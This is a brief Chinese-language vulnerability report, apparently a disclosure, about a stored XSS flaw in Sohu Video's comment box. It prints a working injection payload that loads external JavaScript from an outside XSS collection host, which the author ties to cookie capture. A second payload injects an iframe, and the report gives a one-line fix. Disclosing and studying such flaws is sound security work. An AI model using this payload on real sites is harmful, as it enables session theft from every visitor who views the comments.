搜狐视频某重要功能储存XSS - 网站安全 - 自学

想看《中国好声音》其他视频网站貌似没有播放版权，就去搜狐看了，看的人真多，流量很大。这位置要是有个XSS那是不是很给力，而且还能调用任意外部js文件~

详细说明：真没想到诶，评论框位置居然存在xss，而且是基本啥都没过滤的那种。

 

可以随意调用外部js文件。

 

sae有些问题xsser.me暂时用不了，没法截抓取cookie的图了。

 

危害：看下面第一个图，此利用代码插入后，只要有一个人回复，原网页就会多生成一条script调用外部js的代码，所以不存在xss留言被刷的不显示了，xss代码就失效的问题。 

漏洞 证明：诶，刷评论的人太多了，截图难度略大，还好我手快截图了两张。

 

 

 

1 调用外部js文件。插入的利用代码

<textarea/>"><img src=1 onerror="with(document)body.appendChild(createElement(String.fromCharCode(115,99,114,105,112,116))).src='//pxss.sinaapp.com/l6OBji'">

 

2 插入百度首页。插入的利用代码

<textarea/><iframe src=http://www.baidu.com/></iframe>

 

修复方案： 过滤xss特殊字符 

 

查看更多关于搜狐视频某重要功能储存XSS - 网站安全 - 自学的详细内容...